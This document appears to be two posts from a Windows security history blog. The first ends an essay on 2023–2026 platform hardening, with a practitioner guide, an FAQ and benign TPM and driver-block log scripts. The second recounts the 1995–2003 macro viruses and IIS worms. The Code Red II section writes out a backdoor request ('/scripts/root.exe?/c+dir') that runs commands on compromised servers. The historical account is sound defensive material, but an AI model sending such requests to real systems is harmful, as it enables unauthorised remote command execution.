The agentic-AI persistence attack class. The CVE catalog is beginning to populate (EchoLeak [@nvd-cve-32711], PromptJacking [@koi-promptjacking], ShadowPrompt [@koi-shadowprompt], ZombAIs [@nvd-cve-53773], the Bargury chain [@mbgsec-bargury-pdf]). Microsoft's response surface is Win32 App Isolation expansion plus Edge AI Browser sandboxing plus Prompt Shields plus Distinct Agent Accounts (announced in the November 18, 2025 roadmap post) [@nov18-2025-preparing-next] [@app-isolation] [@jailbreak-detection-shields]. An OS-level "policy on AI agent judgment" primitive is not yet visible in production.

Whether SFI's cultural change compounds. The April 2025 and November 2025 progress reports quantify improvement on the identity-token and signing-key axes [@sfi-apr-2025] [@sfi-nov-2025-windows]. Whether the same compounding occurs on the supply-chain, third-party-dependency, and human-OPSEC axes is the next progress report's load-bearing claim. The Hotpatch metric (81% of enrolled devices compliant within 24 hours of Patch Tuesday) [@sfi-nov-2025-windows] is the most measurable single indicator.

The OpenID Foundation Shared Signals Framework is the cross-vendor standardization vehicle for Continuous Access Evaluation equivalents [@openid-sse]; production-grade CAE-equivalent deployments outside the Microsoft 365 boundary are a 2026-2027 open problem.

Whether the Pluton-vs-discrete-TPM bifurcation gets settled. As of May 2026, Dell, Lenovo, and HP still have public reservations about Pluton-as-TPM on enterprise SKUs; the Pluton-as-TPM configurability flag is the live compromise [@pluton-docs]. The default behavior varies by OEM and SKU.

The forward question. Does the WESP rollout land in time for the 2026 ransomware wave? If WESP private preview hardens into GA before the next CrowdStrike-class incident -- malicious or not -- then the institutional response has matched the threat timeline. If it does not, the era's open question becomes the opening question of Part 7.

If those are the open problems, the question for a working practitioner is: what should you actually do today? The next section answers per surface.

10. Practical Guide

What a Windows platform security practitioner should be doing today, per surface. The thesis is the architectural diagnosis; this section is the operational prescription.

Identity. Move your workloads to the hardened identity SDK; require Continuous Access Evaluation on Conditional Access policies; rotate any unrotated long-lived signing keys; verify your tenant's Entra ID and MSA flow is on the post-SFI signing-key infrastructure [@sfi-apr-2025] [@cae-docs].

Endpoint. Default-on Smart App Control on new builds; enable Personal Data Encryption for user-folder protection; deploy Application Security Reduction rules including the AI-feature exclusions; track WESP private-preview availability if you ship an antivirus or EDR product [@wri-jun26-2025].

AV and EDR. If you operate a Windows fleet, audit your kernel-driver dependency surface against the April 2026 vulnerable-driver-blocking list (the psmounterex.sys family is the named exemplar) [@april-2026-driver-kb] [@driver-block-rules]; verify your AV or EDR vendor has a WESP transition roadmap and an MVI 3.0 commitment [@ms-securityweek-wesp]; budget for a 12-to-24-month transition from kernel-mode to user-mode EDR; instrument Event ID 3077 in the Code Integrity log for blocked-driver visibility [@techcommunity-cross-signing].

AI features. Default-off the AI features that store user content (Recall, Copilot Vision history) until you have an enterprise policy; use the Intune Settings Catalog policies for Recall (AllowRecallEnablement, DisableAIDataAnalysis) [@recall-manage-docs]; evaluate prompt-injection exposure for every browser-integrated and Office-integrated AI agent [@anthropic-prompt-injection]; treat the AI agent's network reach as a Conditional Access surface.

Post-quantum. Audit your TLS, IPsec, code-signing, and key-management surfaces for PQ-migration readiness; track Microsoft's published PQ-migration timelines per surface [@sfi-apr-2025]; do not deploy custom ML-KEM or ML-DSA outside NIST-validated libraries [@fips-203] [@fips-204].

Pluton. Verify your hardware-refresh cycle moves to Pluton-capable silicon (AMD Ryzen 6000+; Intel Core Ultra Series 2 and later; Snapdragon 8cx Gen 3 and X Series) [@pluton-docs]; decide your Pluton-as-TPM configuration policy for new procurement; remember "Pluton present" is not "Pluton enabled" -- confirm OEM-exposed TPM type via Get-Tpm plus BIOS toggle inspection.

Two of those operational steps -- the Pluton-as-TPM status check and the Event ID 3077 monitoring -- are concrete enough to demonstrate. The runnable code blocks below are the verifiable form.

{` // PowerShell on Windows: Get-Tpm | Select-Object ManufacturerIdTxt, ManufacturerVersion, ManagedAuthLevel // The JSON below is a representative shape returned by a Pluton-as-TPM machine. const tpm = { ManufacturerIdTxt: "MSFT", ManufacturerVersion: "1.0.0.0", ManagedAuthLevel: "Full", TpmPresent: true, TpmReady: true, };

function classifyTpm(tpm) { if (!tpm.TpmPresent) return "no TPM detected"; if (!tpm.TpmReady) return "TPM present but not ready (clear/initialize via tpm.msc)"; if (tpm.ManufacturerIdTxt === "MSFT") return "Pluton-as-TPM (Microsoft firmware TPM)"; if (tpm.ManufacturerIdTxt === "AMD" || tpm.ManufacturerIdTxt === "INTC") return tpm.ManufacturerIdTxt + " firmware TPM (fTPM); Pluton may be present but not the TPM"; return "discrete TPM by manufacturer " + tpm.ManufacturerIdTxt; }

console.log(classifyTpm(tpm)); `}

{` // PowerShell: Get-WinEvent -LogName 'Microsoft-Windows-CodeIntegrity/Operational' -FilterXPath "*[System[EventID=3077]]" // Event ID 3077 = a driver was blocked from loading. // Representative subset of fields shown below. const events = [ { Id: 3077, FileName: "psmounterex.sys", PublisherName: "Cross-Signed Legacy CA", Action: "Blocked" }, { Id: 3077, FileName: "vulndrv.sys", PublisherName: "WHCP", Action: "Blocked-Driver-Blocklist" }, { Id: 3076, FileName: "okaydriver.sys", PublisherName: "WHCP", Action: "AuditOnly" }, ];

const blockedLoads = events.filter(e => e.Id === 3077 && e.Action.startsWith("Blocked")); for (const e of blockedLoads) { console.log("BLOCKED:", e.FileName, "(" + e.PublisherName + ")"); } `}

Note: The April 2026 vulnerable-driver-blocking list names psmounterex.sys as the first exemplar [@april-2026-driver-kb]. Any third-party tool that depends on it for backup or storage management will fail until the vendor ships a WHCP-signed replacement. Inventory your driver dependency graph before the April 14, 2026 Patch Tuesday lands across your fleet.

The April 2025 SFI progress report states that Entra ID and MSA access-token signing keys are in hardware-backed security modules with automatic rotation, and that the MSA signing service runs in Azure Confidential VMs [@sfi-apr-2025]. This is a Microsoft-side fact about *Microsoft's own tenants and signing services*, not a customer-tunable setting. For your own tenant, the things you can actually verify are: that Conditional Access policies enable CAE (Entra admin center: Conditional Access > Sessions); that your applications validate the `iss`, `aud`, `kid`, and `tid` claims per RFC 8725 [@rfc-8725]; and that any long-lived application secrets you manage are stored in Azure Key Vault Managed HSM with rotation enabled [@azure-managed-hsm]. There is no customer-visible knob for "use the post-SFI signing service" -- the signing service is upstream of your tenant and is managed by Microsoft.

11. Frequently Asked Questions

Seven load-bearing misconceptions of the era. Each gets a short answer with a back-reference to the relevant section.

No. Microsoft's September 6, 2023 post initially hypothesized that path, then retracted it in an in-place edit on March 12, 2024 with the verbatim sentence: "we have not found a crash dump containing the impacted key material" [@msrc-storm0558-key-acq]. The CSRB report (April 2, 2024, page 17) is equally explicit: "Microsoft has been unable to determine how or when Storm-0558 obtained the MSA key" [@csrb-2024]. The acquisition mechanism is, as of May 2026, unknown. See section 3. No. Windows 11 24H2 reached Copilot+ PC RTM on June 18, 2024 and broad-SKU RTM on October 1, 2024; neither shipped Recall. Recall was pulled from the planned June 18, 2024 Copilot+ PC ship date via an in-place editor's note on the June 7, 2024 Davuluri post -- a five-day pull, not "weeks before launch" [@recall-davuluri-jun7-2024]. Recall returned to the Windows Insider Program on November 22, 2024 and reached general availability on May 13, 2025 [@recall-manage-docs]. See section 4.2. No. Microsoft is *transitioning* AV and EDR to user mode via WESP, which opened in MVI 3.0 private preview in July 2025 [@wri-jun26-2025] [@ms-securityweek-wesp]. Microsoft is *separately* deprecating the legacy Cross-Signing Program in the April 14, 2026 Windows security update, beginning in evaluation mode with a 100-runtime-hour and 2-or-3-restart criterion [@techcommunity-cross-signing]. No public document names a hard categorical ban date. WHCP-certified kernel drivers continue to load. See section 4.3. No. PatchGuard prevents in-kernel patching of protected kernel structures by other in-kernel code. It does nothing about a signed, KMCS-trusted, third-party driver loading malformed configuration data into a kernel-resident process -- the CrowdStrike Channel File 291 pattern [@crowdstrike-rca-pdf]. The vendor's own data pipeline is the failure surface PatchGuard was never designed to cover. See section 4.3. The honest answer: SFI has produced measurable deliverables on identity and signing-key custody. The April 2025 report quantifies the identity-SDK validation lift from 73% to 90%, the MSA signing-key move to hardware-backed security modules with automatic rotation, and the MSA signing service migration to Azure Confidential VMs [@sfi-apr-2025]. The September 2024 report formalizes the executive-compensation tie-in [@sfi-sept-2024]. Whether the same compounding occurs on the supply-chain and human-OPSEC axes is the open empirical question. The institutional change is real; whether it durably shifts the security culture is still being measured. See sections 4.1 and 9. No. Pluton can be used *as* a TPM or *with* a discrete TPM. The configuration is OEM-determined and per-SKU [@pluton-docs]. "Pluton present" is not the same as "Pluton acting as TPM"; confirm via `Get-Tpm` and BIOS toggle inspection. See section 4.5. No. SQL Server 2019 Always Encrypted with secure enclaves, generally available November 4, 2019, is the substrate precedent [@sql-always-encrypted-enclaves]. The correct narrower claim is that Recall is the first VBS-Enclave deployment in the Windows desktop shell to face sustained adversarial review by named external researchers. See section 4.2.

Key idea: The 2023-2026 era is the first in NT's history in which the layer above the OS -- the institution's own identity-token custody, the third-party kernel-mode security vendor, and the AI feature application plane -- became the load-bearing security boundary under public scrutiny while the OS layer kept hardening. SFI, WESP, the Recall Generation-3 architecture, and the April 14, 2026 Cross-Signing trust deprecation are Microsoft's first sustained engineering re-architecture of all three soft spots in parallel. Whether the response lands in time for the 2026 ransomware wave is the open forward question of Part 7.

The 2006-2009 EU-engagement settlement was an honest engineering compromise of its time -- the AV industry needed a sanctioned kernel path; Microsoft needed PatchGuard not to be antitrust-actionable; customers needed both. The compromise survived eighteen years because the failure mode the era worried about was the malicious kernel-resident driver, and KMCS plus the Vulnerable Driver Blocklist eventually contained that mode. What it never tested was a non-malicious data-parsing bug in a sanctioned, signed driver at fleet scale. The morning of July 19, 2024 ran that test once. The verdict came in twenty bytes.

Two Months Without Code: The Windows Security Wars Part 1 (1995-2001)

noreply@paragmali.com (Parag Mali) — Sat, 30 May 2026 00:00:00 GMT

Between 1995 and 2001, Microsoft shipped the most-used operating system on Earth into an Internet it was not architecturally prepared for. Concept, Melissa, ILOVEYOU, Code Red, Nimda, and Slammer demonstrated that reactive patching could not win the speed race with weaponized exploits. On Tuesday, January 15, 2002 at 5:22 PM Pacific, Bill Gates sent the roughly 1,500-word "Trustworthy computing" memo. On February 11, 2002, approximately 8,500 Windows engineers stopped writing features and spent about ten weeks and one hundred million dollars on threat modeling, banned-API review, fuzzing, and the first mandatory Final Security Review gate. The result was the Microsoft Security Development Lifecycle (SDL), and every secure-development framework the industry has standardized since (BSIMM, OWASP SAMM, ISO/IEC 27034, NIST SSDF, SLSA, CISA Secure by Design) traces back to it.

1. Two Months Without Code

On Monday, February 11, 2002, in Building 26 of Microsoft's Redmond campus, Brian Valentine -- Senior Vice President of the Windows Division -- told roughly 8,500 Windows engineers to stop writing features [@howard-lipner-push-2003] [@washtech-microsoft-100m] [@msft-news-valentine-mms-2002]. For the next ten weeks they would sit through mandatory secure-coding training, threat-model every component they owned, audit their code against a published banned-API list, and gate-review every change through a Final Security Review checkpoint that had not existed three weeks earlier [@howard-lipner-push-2003] [@lipner-acsac-2004]. The cost: about one hundred million dollars in foregone feature work [@washtech-microsoft-100m]. The order traced, precisely, to a 1,500-word email Bill Gates had sent twenty-seven days earlier at 5:22 PM Pacific [@gates-memo-wired] [@helpwithwindows-billg].

Stop and notice what that means. An operating-system vendor whose product ran on most business desktops on the planet ordered its largest engineering organization to stop shipping the product for two months. The lost revenue is the easy number. The hard number is the implicit admission: a company halts an engineering org of that size only when the cost of not halting is bigger.

What does a company have to lose before its CEO writes that order?

This article is the answer. It traces the seven-year run-up that made halting development the proportionate response, the memo that called the halt, the ten-week operation that followed, and the discipline that pattern became -- the discipline every secure-development framework on the industry shelf in 2026 traces back to.

It is also a quarrel with one sentence. The literal version of the article's working claim is this:

"Microsoft did not have a security team until January 15, 2002."

That sentence is wrong in exactly the way every popular retelling of this era is wrong. Microsoft did have a security team. It had the Microsoft Security Response Center (MSRC), founded in 1998 and reachable from MS98-001 onward [@msrc-org] [@howard-lipner-push-2003]. It had the Secure Windows Initiative (SWI), a small in-house secure-development team running since around 2000 under Michael Howard [@howard-lipner-push-2003]. It had STRIDE, a categorized threat list written internally on April 1, 1999 by Loren Kohnfelder and Praerit Garg [@shostack-tm-book]. It had Howard and David LeBlanc's Writing Secure Code, published by Microsoft Press in November 2001 and reportedly required reading for every Microsoft engineer [@howard-leblanc-wsc]. The methodology, the books, the team, and the published threat list were all in the building.

By section 5, this article earns a stronger -- and defensible -- version of the literal claim. Hold the literal sentence loosely; the corrected one is worth more.

The story turns on six names you will meet in sections 3 and 4: Concept (July 1995), Melissa (March 1999), ILOVEYOU (May 2000), Code Red (mid-July 2001), Nimda (September 2001), and SQL Slammer (January 2003) [@fsecure-concept] [@cert-ca-1999-04-melissa] [@cert-ca-2000-04-iloveyou] [@caida-codered] [@cert-ca-2001-26-nimda] [@caida-slammer]. Each name is also a generation of attack. Each generation broke an assumption the previous defenses had quietly depended on. By the end of 2001, the cumulative effect was a vendor whose customers no longer believed it could keep them safe.

That is what a company loses before its CEO halts development. How it got there takes seven years to tell. Begin at the architectural starting line.

2. Two Windowses, Two Security Stories

The first surprise of the era is structural. There were two Windowses, and only one of them had a security model at all.

The NT line -- Windows NT 3.1 in July 1993, NT 3.5, NT 4.0 in 1996, Windows 2000 in February 2000 -- was the work of David Cutler's team, hired by Microsoft in August 1988 with about twenty colleagues from Digital Equipment Corporation [@zachary-showstopper] [@msft-lifecycle-products]. Cutler had led the VMS operating-system project at DEC, and he carried VMS's engineering discipline into NT: a formal kernel/executive separation, an object manager that treated every kernel-allocated thing as a named object with a security descriptor attached, and a small kernel component called the Security Reference Monitor whose only job was to consult that descriptor on every access attempt [@russinovich-solomon-iw2k] [@msft-access-control].NT was patterned on VMS, not literally inherited from it. DEC threatened legal action against Microsoft over the engineering similarities and Cutler's role; the parties resolved the dispute through the 1995 DEC-Microsoft alliance, in which Microsoft paid roughly $105 million (including $75 million to bolster DEC's NT service-and-support operation) and committed to keeping Windows NT supported on DEC's Alpha processor [@techmonitor-dec-microsoft-alliance] [@zachary-showstopper].

The Win9x line -- Windows 95 in August 1995, Windows 98 in June 1998, Windows Me in September 2000 -- shared a name and a Start menu with NT and almost nothing else [@msft-lifecycle-products]. Underneath, Win9x was a 32-bit graphical shell wrapped around the 16-bit DOS kernel. It had no SIDs, no per-object access control lists, no kernel-mediated access check, no concept of process identity at all. Every process ran with effective access to every file on disk, every key in the registry, and every other process's address space [@russinovich-solomon-iw2k].

The kernel component of Windows NT (and every NT-line OS since: 2000, XP, Vista, 7, 8, 10, 11) that performs the access check on a securable object. When a thread asks to open a file, the I/O manager hands the request to the object manager, which calls the SRM. The SRM compares the access token attached to the thread (which carries the user's SID and the SIDs of every group the user belongs to) against the security descriptor on the object (which carries the DACL listing who is allowed which access rights). If the DACL grants the requested rights, the open succeeds; otherwise it fails with `STATUS_ACCESS_DENIED`. Every securable Windows kernel object carries a security descriptor with two access control lists. The **DACL** (Discretionary Access Control List) is an ordered list of ACEs (Access Control Entries) that grant or deny specific rights to specific principals. The **SACL** (System Access Control List) is the audit list; it tells the kernel which access attempts to log to the Security event log. The owner of an object can edit its DACL; only an administrator with the `SeSecurityPrivilege` right can edit its SACL. A variable-length binary identifier that names a principal -- a user, a group, a computer, a service. SIDs have a defined structure (revision, identifier authority, sub-authorities) and are unique within their authority. Windows uses SIDs internally because they are stable across renames and translatable across trust boundaries; human-readable names like `DOMAIN\jdoe` are convenience labels that get resolved to SIDs before any access check runs.

When a thread on NT asks to open a file, the path through the kernel looks like this:

flowchart TD A[User thread requests open] --> B[I/O Manager builds IRP] B --> C[Object Manager looks up named object] C --> D[Security Reference Monitor] D --> E[Compare access token SIDs against DACL ACEs] E --> F{"Granted rights ≥ desired access?"} F -->|Yes| G[Return handle with granted access mask] F -->|No| H[Return STATUS_ACCESS_DENIED]

That pipeline is what made NT, in principle, a hardened operating system from its first release in 1993. It is the same pipeline every NT-line Windows has executed for thirty-three years; Microsoft's current public reference still describes the same primitives [@msft-access-control].

So why was NT not, in practice, the hardened operating system the architecture promised?

The answer is the load-bearing observation of the era's first half: the primitives existed; the defaults rendered them inert. Through NT 3.1, NT 3.5, NT 4.0, and well into Windows 2000, the default DACL on huge swaths of the filesystem and registry was Everyone: Full Control. The Everyone SID matches every authenticated user and, depending on configuration, often the anonymous logon as well. A DACL that grants Everyone: Full Control is a permission check that always succeeds. Microsoft's documentation of the era is matter-of-fact about this: the defaults were preserved to maintain application-compatibility expectations carried over from the Win9x world, where applications had been written assuming no permission check at all [@russinovich-solomon-iw2k].

On a clean Windows NT 4.0 install, the per-directory ACL table that Microsoft Knowledge Base article Q148437 ("Default NTFS Permissions in Windows NT") preserved verbatim made the gap operationally concrete [@kb-q148437-wayback]. Two directories illustrate the pattern. **`%SystemRoot%\repair`** -- the destination of `rdisk /s`, where the SAM, SECURITY, SOFTWARE, SYSTEM, and DEFAULT registry hives get backed up -- shipped with **`Everyone: Full Control`** [@kb-q148437-wayback]. Any unprivileged interactive user could read or replace the SAM-hive backup. **`%SystemRoot%\system32`** -- the directory the LSA, user-mode subsystems, and print spooler load DLLs from -- shipped with **`Everyone: Change`** (RWXD), so an unprivileged user could write into the system DLL search path [@kb-q148437-wayback]. The same table records two more `Everyone: Full Control` directories in the default install: `%SystemRoot%\system32\spool\drivers\w32x86\1` (print drivers) and `%SystemRoot%\system32\wins` (the WINS service) [@kb-q148437-wayback]. Three of the era's most-exploited primitives -- SAM-hive theft, DLL hijack, print-spooler abuse -- mapped directly to defaults the OS shipped with. Windows 2000 tightened many of these; XP and Server 2003 tightened more; the cleanup was not nominally complete until Vista's UAC redesign in 2006. The architecture did not change. The defaults did.

The Win9x side has no such defense-of-the-defaults story to tell, because Win9x had no access check to default. On a Win98 box, the file c:\windows\system\kernel32.dll was simply a file. Any program could open it, read it, write it, or rename it. The phrase "least privilege" did not apply, because there was no privilege to constrain.

This is the architectural starting line of the era. Two Windowses, two stories, one shared problem: the strongest version had a security model that defaults defeated, and the weakest had no security model to defeat in the first place. Both, in the tens of millions, were about to be connected to a public Internet that did not yet exist when either had been designed.

What happens when you connect that pair of architectures to that network is the next two sections.

3. The Attack Class That Cracked Office (1995-2000)

Open with a small artifact. Sometime in mid-1995, copies of a Microsoft CD-ROM shipped to customers carrying, by accident, the first widely distributed Word macro virus. It was called Concept. Its only payload was a benign dialog and a comment in the macro source that read REM That's enough to prove my point [@fsecure-concept] [@virusencyclopedia-concept].

That was the joke. Then the rest of the industry stopped laughing.

A program that infects documents (rather than executables) by hijacking the document format's embedded scripting language. Word's WordBasic in 1995 and VBA in 1997 could read and write files, manipulate the host application, and -- critically -- run automatically on document open via `AutoOpen` and on document save via `FileSaveAs`. A macro virus is the same shape as a classical file-infector virus, except its host file is `.doc` instead of `.exe` and its execution surface is the application that opens the document, not the operating system that runs the binary. **VBScript** is a Microsoft scripting language, syntactically a subset of Visual Basic, designed for embedding in web pages (in Internet Explorer) and standalone scripts (run by WSH). **Windows Script Host** is the Windows component that executes scripts written in VBScript, JScript, or other registered languages, via the executables `wscript.exe` (windowed) and `cscript.exe` (console). WSH was first shipped with Windows 98 and was available as an optional add-on for NT 4.0 and Windows 95. It was on by default; a `.vbs` file double-clicked in Explorer ran in `wscript.exe` without further confirmation.

The era's three Office-style artifacts each carried a lesson the next one had to escalate past.

Concept (July 1995)

Concept was a WordBasic macro virus written for Microsoft Word 6.x. On document open it ran an AutoOpen macro that copied itself into Word's global template NORMAL.DOT. Every document Word saved from that point on inherited the infection, because every FileSaveAs operation now ran through the infected template's hook [@fsecure-concept].First-in-the-wild detection of Concept is canonically dated to July 1995, per the Microsoft Defender Threat Encyclopedia and the Virus Encyclopedia [@defender-concept-encyclopedia] [@virusencyclopedia-concept]. The "September 1995" date often cited in retellings refers to CIAC Notes 95-12, the bulletin, not the first detection [@ciac-i-023-macro].

Concept was cross-platform: it infected Word for Windows 6.x/7.x and Word for Macintosh 6.x, because WordBasic was portable [@fsecure-concept]. By the time it was named and tracked, copies had shipped on at least one Microsoft CD-ROM and on training materials from at least one other software vendor [@ciac-i-023-macro].

The lesson hidden in Concept is bigger than the virus. Any application that ships with a Turing-complete macro language, an auto-execute hook, and a write-enabled global template ships an execution surface. The user did not have to "run a program"; opening a document was running a program, because the document carried the program inside it. That was the first time the popular distinction between "data" and "executable" failed at consumer scale.

Melissa (March 26, 1999)

Four years later, that lesson met email.

CERT/CC's advisory CA-1999-04 records the moment: "At approximately 2:00 PM GMT-5 on Friday March 26 1999 we began receiving reports of a Microsoft Word 97 and Word 2000 macro virus" [@cert-ca-1999-04-melissa]. The virus was written in VBA (the successor to WordBasic that Office 97 introduced) by a New Jersey programmer named David L. Smith.

It carried the now-standard AutoOpen infection of NORMAL.DOT, but it added something Concept could not have done in 1995: it opened Microsoft Outlook through the MAPI interface, walked the first fifty entries of every address book it could read, and emailed the infected document to each one [@cert-ca-1999-04-melissa]. For good measure, it lowered Office's macro security settings on each infected machine, so the next infected document would run its macro without a prompt [@cert-ca-1999-04-melissa].

The propagation pattern is worth a diagram of its own:

sequenceDiagram participant U as User participant W as Word participant N as NORMAL.DOT participant O as Outlook MAPI participant R as 50 recipients U->>W: Open list.doc attachment W->>W: Fire AutoOpen macro W->>N: Infect NORMAL.DOT W->>O: Read first address book O-->>W: Return 50 entries W->>R: Send list.doc to each R->>U: Recipients open list.doc Note over W,N: Loop repeats per recipient

The math of the loop is uncomfortable. If each infected user has at least one populated fifty-entry address book and a non-trivial fraction of recipients open the attachment, the early growth is geometric in fan-out. No spam filter of the era could outrun it, because the senders were not spammers -- they were the recipient's actual colleagues, sending a document they had actually edited, from a real email address with a real return path. Address-book amplification by trusted senders is, by definition, a self-amplifying email feedback loop.

Melissa's payload was deliberately benign (it inserted a Simpsons quote into the open document on certain dates), but its propagation forced corporate email shutdowns at a long list of Fortune 500 sites within seventy-two hours [@cert-ca-1999-04-melissa].Contemporaneous trade press reported shutdowns at Lockheed Martin, Lucent, Microsoft, and others. The CERT advisory itself describes a "widespread attack affecting a variety of sites" without naming specific companies. Smith was arrested April 1, 1999.

The lesson the industry should have read off Melissa: a macro that can read the address book is not an Office decision; it is a platform decision. Office let macros call Outlook because the COM-automation model invited it; Outlook let other applications read the address book because that was the entire point of MAPI. The trust boundary the user thought was around their inbox was, in API terms, around every other application running as the same user.

ILOVEYOU (May 4-5, 2000)

Thirteen months later, the lesson generalized off the Office platform.

CERT/CC's advisory CA-2000-04 names the attachment: LOVE-LETTER-FOR-YOU.TXT.vbs, with a "Love Letter" subject line and a body asking the recipient to "kindly check the attached LOVELETTER" [@cert-ca-2000-04-iloveyou]. The .vbs extension matters. ILOVEYOU was not a Word macro virus.Popular retellings group Concept, Melissa, and ILOVEYOU as one continuous Office-macro story. They are not. ILOVEYOU was a VBScript / Windows Script Host email worm, executed by wscript.exe when the user double-clicked the attachment in Outlook [@cert-ca-2000-04-iloveyou]. The execution surface is WSH, not Office.

It was a VBScript file -- a script in plain text, executed by wscript.exe. Windows Explorer's default setting, "hide extensions for known file types," hid the .vbs suffix from the filename column. The user saw LOVE-LETTER-FOR-YOU.TXT, an apparently inert text file, and double-clicked it. Explorer handed the file to its registered handler, which was wscript.exe, which ran it.

Once running, the script copied itself into the Windows system directory, registered itself to run at every boot, overwrote files with selected extensions (.jpg, .mp3, .vbs), and -- like Melissa -- mailed itself to every address it could reach through Outlook. BBC News, datelined Thursday May 4, 2000 19:28 GMT, recorded the outbreak appearing first in Hong Kong, sweeping the US State Department, CIA, FBI, Pentagon, White House, and Congress, and the UK House of Commons, the Danish parliament, the Swiss federal government, and banks across Europe within hours, with reports pointing to a Philippine origin [@bbc-love-bug-2000-05-04] [@cert-ca-2000-04-iloveyou]. Trade-press damage estimates of "tens of millions" of infected machines and "billions of dollars" in cleanup were folk-knowledge of the era; the underlying classification as a VBScript / WSH email worm is what survives in the primary record [@cert-ca-2000-04-iloveyou].

The lesson ILOVEYOU should have forced: Windows Script Host was on by default, hidden extensions concealed the executable surface, and Outlook's auto-execute-attachments behavior treated .vbs like any other attachment. Three Microsoft platform decisions, each individually defensible, composed into a one-double-click remote code execution path on a freshly installed Windows 98 machine.

The three artifacts collapse into a single comparison table:

Year	Name	Execution surface	Propagation vector	On by default?	Primary lesson
July 1995	Concept [@fsecure-concept] [@virusencyclopedia-concept]	Word WordBasic macro	Infected document opened in Word	Yes (macro auto-exec)	A document is an executable when the application supports macros.
March 1999	Melissa [@cert-ca-1999-04-melissa]	Word VBA macro	Word + Outlook MAPI; 50 address-book entries per infected host	Yes (macro auto-exec, MAPI access)	A macro with address-book access creates a self-amplifying email storm by trusted senders.
May 2000	ILOVEYOU [@cert-ca-2000-04-iloveyou]	VBScript via Windows Script Host (`wscript.exe`)	Outlook attachment, double-extension hidden by Explorer default	Yes (WSH on by default, extensions hidden)	The "Office macro" attack class generalized to any double-clickable script the platform interpreted.

Document-as-execution-surface had a known fix shape from the moment Concept shipped: disable auto-execute, prompt the user, and -- eventually -- block by default. The block-by-default fix, for Office VBA macros downloaded from the internet, did not fully ship until February 2022, twenty-seven years after Concept [@ms-learn-internet-macros-blocked]. Section 9 walks the deprecation playbook that delay is evidence for.

But document execution is only half of the era's attack story. What happens when the execution surface is not a document the user opened, but a network port a worm reached without the user doing anything at all?

4. The Attack Class That Cracked the Server (2001-2003)

Two dates frame the whole story.

June 18, 2001: Microsoft publishes Security Bulletin MS01-033, "Unchecked Buffer in Index Server ISAPI Extension Could Enable Web Server Compromise." The bulletin patches an unchecked stack buffer in idq.dll, the Indexing Service ISAPI extension loaded by Internet Information Services (IIS) 4.0 and 5.0. A specially crafted HTTP GET to a URL ending in .ida can overflow the buffer and execute attacker-supplied code in the IIS worker process, which runs as LocalSystem [@ms01-033-idq].

July 19, 2001: thirty-one days later, the second-generation Code Red worm saturates roughly 359,000 IIS servers in under fourteen hours [@caida-codered] [@cert-ca-2001-19-codered]. The worm reaches its victims via a single HTTP GET. No user clicks. No email attachment. No double-click. A web server with port 80 open to the Internet and the unpatched idq.dll is, by definition, already listening for the attack.

A computing monoculture exists when a large population of independently administered hosts run identical software with identical defaults. The security significance is statistical: a single vulnerability discovered in the monoculture's shared software is, in expectation, exploitable against the entire population. The 2001-2003 Windows-server worms (Code Red, Nimda, Slammer) are the canonical case studies; CAIDA's Code Red measurement and Moore et al.'s Slammer measurement are the empirical anchors that made the monoculture argument quantitative rather than rhetorical [@caida-codered] [@caida-slammer].

What kind of defense survives a thirty-one-day patch-to-mass-exploitation window? The next seven months answer that question four different ways.

Code Red I (mid-July 2001)

A Northern California security boutique called eEye Digital Security discovered and reverse-engineered the worm. Marc Maiffret and Ryan Permeh named it "Code Red" after the Mountain Dew flavor they were drinking through the analysis [@eeye-codered-ii].Popular retellings sometimes date the discovery to July 13, 2001. The eEye back-reference in their August 4, 2001 Code Red II advisory points at advisory AL20010717 -- July 17, 2001 [@eeye-codered-ii]. "Mid-July 2001" or "July 17, 2001" is the better-attested date. The Mountain Dew naming detail comes from contemporaneous interviews with the eEye analysts, not the AL20010804 advisory itself.

The initial Code Red variant -- "Code Red v1" -- carried a fixed-seed random-number generator in its IP scanner. Because every infected host generated the same sequence of scan targets, the worm spent most of its scanning budget on the same small set of IP addresses, and its spread was bounded. It was annoying. It was not yet a measurement event.

That changed when somebody fixed the scanner.

Code Red v2 (July 19, 2001)

Code Red v2 was a rewritten worm using the same MS01-033 vulnerability but with a proper random scanner. The fix was tiny -- a different seed and a real entropy source -- and the consequences were huge. The CAIDA measurement, published by Moore, Shannon, and Brown in the Internet Measurement Workshop 2002, recorded the outbreak: "On July 19, 2001, more than 359,000 computers connected to the Internet were infected with the Code-Red (CRv2) worm in less than 14 hours" [@caida-codered] [@cert-ca-2001-19-codered]. The peak rate was over 2,000 newly infected hosts per minute.

The exploit path on each victim looked like this:

sequenceDiagram participant W as Worm host participant V as Victim IIS participant I as idq.dll participant S as LocalSystem shell W->>V: HTTP GET /default.ida + long URL V->>I: ISAPI dispatch to Indexing Service I->>I: Buffer overflow in URL parse I->>S: Shellcode runs in LocalSystem context S->>S: Patch idq.dll in memory, install worm body S->>W: Spawn 100 scanner threads Note over W,V: Each thread tries random IP:80, repeat

The lesson that should have been read off Code Red v2 was a property of the population, not of the worm. The vulnerable population was large (anyone running IIS 4.0 or 5.0 with default modules enabled and the MS01-033 patch not applied), identical (every IIS install shipped the same idq.dll), and reachable (TCP port 80 is by definition Internet-facing on a web server). That set of properties is the operational definition of a monoculture, and Code Red v2 was its first quantitative case study.

Code Red II (August 4, 2001)

Sixteen days after Code Red v2 saturated the IIS population, a different worm appeared with a confusing name. "Code Red II" reused the MS01-033 vulnerability and the same .ida injection vector, but the rest of it was unrelated to v1 or v2. eEye's August 4, 2001 analysis by Permeh and Maiffret documents the difference: where the earlier worms had a self-contained scanner-and-payload binary in memory, Code Red II dropped a copy of cmd.exe named root.exe into the IIS /scripts and /msadc directories, then dropped a trojanized explorer.exe that re-enabled the C: and D: drives as the IIS virtual roots /c and /d [@eeye-codered-ii].

The practical effect: any HTTP GET to /scripts/root.exe?/c+dir on a compromised host returned a directory listing of the victim's C:\ drive, executed in the LocalSystem context. A permanent, anonymous, remote shell, reachable by anyone who knew the URL [@eeye-codered-ii].

The lesson Code Red II adds: one worm's residual artifact is another worm's propagation vector. Patching MS01-033 closed the door that let Code Red II in. It did not close the doors Code Red II left open behind it. A web server infected by Code Red II before its operator patched MS01-033 still had root.exe waiting in /scripts, indefinitely. The patching mental model -- "apply the patch, the bug is fixed" -- mismodels the state.

Nimda (September 18, 2001)

Six weeks later, exactly that mismodeling was exploited.

The Nimda worm appeared on September 18, 2001, one week after the September 11 attacks, which the worm's name initially fed conspiracies about; "nimda" is "admin" backwards. The CERT/CC advisory CA-2001-26 records its four propagation vectors:

